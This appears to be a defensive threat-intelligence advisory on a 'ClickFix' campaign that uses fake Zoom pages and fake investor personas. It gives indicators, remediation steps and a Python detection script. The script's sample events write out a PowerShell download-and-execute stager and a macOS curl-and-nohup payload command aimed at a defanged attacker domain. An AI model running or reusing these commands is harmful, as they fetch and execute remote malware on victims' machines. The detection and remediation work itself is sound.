Technical Analysis & Remediations

MITRE ATT&CK Mapping
- T1566.002 (Phishing: Spearphishing Link)
- T1204.001 (User Execution: Malicious Link)
- T1059.001 (Command and Scripting Interpreter: PowerShell)
- T1059.004 (Command and Scripting Interpreter: Unix Shell)
- T1140 (Deobfuscate/Decode Files or Information)
CVE Profile
N/A (relies on user execution and social engineering, not vulnerability exploitation).
Telemetry

Hashes (SHA-256)
- 9a778d2b7919717e95072e4dec01c815a5fd81f574b538107652d73d8dc874b6 (Obfuscated Mach-O, 9.3 MB)
- 2fbd34eed9dbf57a44cf1540941fb43a793be27e13e937299167b2b67cb84d6b (Non-obfuscated Mach-O, 37.6 KB)
- 755cc133ae0519accbcfdd5f8f0d9fe1aa08cbcb306c3e5f29ebcb6ac12d9323 (Fake Zoom macOS App)

Domains (defanged)
- zoom[.]us07-web[.]us
- zoom[.]07usweb[.]us
- zoom[.]us05-web[.]us
- goog1e[.]us-meet[.]com
- hedgeweeks[.]online
- lumex[.]capital

Identities
- "Mykhailo Hureiev"
- "Anatolli Bigdasch"
- SolidBit Capital
- MegaBit
- Lumax Capital
Payload Mechanics
Windows: Clipboard injection drops powershell -w h -nop -eC <base64> (hidden window, no profile, encoded command), which decodes to an in-memory Invoke-Expression call that fetches a remote script from hedgeweeks[.]online.
macOS: Clipboard injection executes a bash script that installs Homebrew/Python3 (if missing), downloads a Python payload to /tmp/hduwhv.py, and establishes persistence via nohup bash &.
Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)

GOVERN (GV) – Crisis Management & Oversight
- Issue an immediate security bulletin to all staff (especially HR, Recruiting, and Web3/Crypto dev teams) warning of LinkedIn/Calendly impersonation schemes and the "ClickFix" verification tactic.
DETECT (DE) – Monitoring & Analysis
- Query EDR for PowerShell executions using the -w h -nop -eC flags and originating from browser processes.
- Query EDR for macOS shell executions that initiate curl requests with the exact User-Agent string "User-Agent: macintosh".
- Ingest the provided domain list (zoom[.]us07-web[.]us, hedgeweeks[.]online, etc.) into SIEM and proxy deny-lists.
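As an added example (not code from the report or from Moonlock Lab), a small Python triage rule that applies the DETECT queries above to process-creation events. The event field names, the browser parent list, the benign sample and the constructed base64 stager are assumptions; only the flag spellings, the User-Agent string, the domain and the /tmp path come from the report.

```python
import base64
import re

# Browser parents that should never spawn a hidden, profile-less, encoded PowerShell (assumed list)
BROWSER_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Short and long spellings of the three flags in the report's Windows payload
WIN_HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I)
WIN_NOPROFILE = re.compile(r"-nop(?:rofile)?", re.I)
WIN_ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# macOS stage: curl User-Agent indicator (-A, --user-agent or -H form) and nohup persistence
MAC_UA = re.compile(r"(?:-A|--user-agent|-H)\s+[\"']?(?:User-Agent:\s*)?macintosh", re.I)
MAC_PERSIST = re.compile(r"\bnohup\b.*\b(?:bash|python3?)\b", re.I)

def decode_encoded_command(cmdline):
    """Decode PowerShell's -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = WIN_ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the list of report indicators matched by one process-creation event."""
    reasons, cmd = [], event["cmdline"]
    if event["os"] == "windows" and "powershell" in event["image"].lower():
        if WIN_HIDDEN.search(cmd) and WIN_NOPROFILE.search(cmd) and WIN_ENCODED.search(cmd):
            reasons.append("hidden+noprofile+encoded powershell")
            if re.search(r"\b(?:iex|invoke-expression)\b", decode_encoded_command(cmd) or "", re.I):
                reasons.append("encoded command calls Invoke-Expression")
        if event["parent"].lower() in BROWSER_PARENTS:
            reasons.append("powershell spawned by browser " + event["parent"])
    elif event["os"] == "macos":
        if re.search(r"\bcurl\b", cmd) and MAC_UA.search(cmd):
            reasons.append("curl with User-Agent 'macintosh'")
        if MAC_PERSIST.search(cmd):
            reasons.append("nohup background shell/python (persistence)")
    return reasons

# Constructed sample events, not telemetry from the report: a mirror of the Windows payload
# (base64 built the way PowerShell expects it), benign admin activity, and the macOS stage.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://hedgeweeks[.]online/s')"
SAMPLE_EVENTS = [
    {"os": "windows", "parent": "chrome.exe", "image": "powershell.exe",
     "cmdline": "powershell -w h -nop -eC " + base64.b64encode(STAGER.encode("utf-16-le")).decode()},
    {"os": "windows", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\ops\\backup.ps1"},
    {"os": "macos", "parent": "Terminal", "image": "bash",
     "cmdline": "curl -A 'User-Agent: macintosh' https://hedgeweeks[.]online/p -o /tmp/hduwhv.py; nohup bash -c 'python3 /tmp/hduwhv.py' &"},
]
```

Running classify over each entry of SAMPLE_EVENTS yields three reasons for the first event, none for the benign one, and two for the macOS stage.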
RESPOND (RS) – Mitigation & Containment
- Isolate any endpoints showing connections to hedgeweeks[.]online or anomalous nohup python background processes on macOS.

RECOVER (RC) – Restoration & Trust
- Rebuild compromised systems from a known clean state, as the in-memory/fileless nature of the loaders makes it difficult to verify total eradication without full forensic imaging.

IDENTIFY & PROTECT (ID/PR) – The Feedback Loop
- Implement application control (e.g., AppLocker or macOS endpoint security frameworks) to block unauthorized execution of scripts from temporary directories (e.g., /tmp/).
Remediation - THE HOME USER TRACK (Safety Focus)

Priority 1: Safety
- If you were tricked into pasting code into your Windows Command Prompt/PowerShell or macOS Terminal after encountering a fake CAPTCHA, disconnect from the internet immediately.
- Do not log into cryptocurrency wallets, banking, or email until the device is verified clean.

Priority 2: Identity
- Reset passwords and rotate MFA keys for all sensitive accounts using a known clean device (e.g., a mobile phone on a cellular network).

Priority 3: Persistence
- For macOS users, check for anomalous Python processes running in the background. Given the complexity of the FUD (fully undetectable) Mach-O payloads and the fileless PowerShell execution, backing up personal files and performing a clean OS reinstall is the safest remediation path.
Hardening & References
Baseline: Never copy-paste terminal commands from browser prompts. Legitimate CAPTCHA and Cloudflare verifications will never require local system terminal access.
Framework: NIST CSF 2.0 (PR.AT-1: Awareness and Training).
OSINT Verification: When approached by investment capital firms on LinkedIn, independently verify the firm's domain age (e.g., via WHOIS). Newly registered domains (like lumex[.]capital) paired with AI-generated staff photos are primary indicators of fraudulent intent.
Source: Moonlock Lab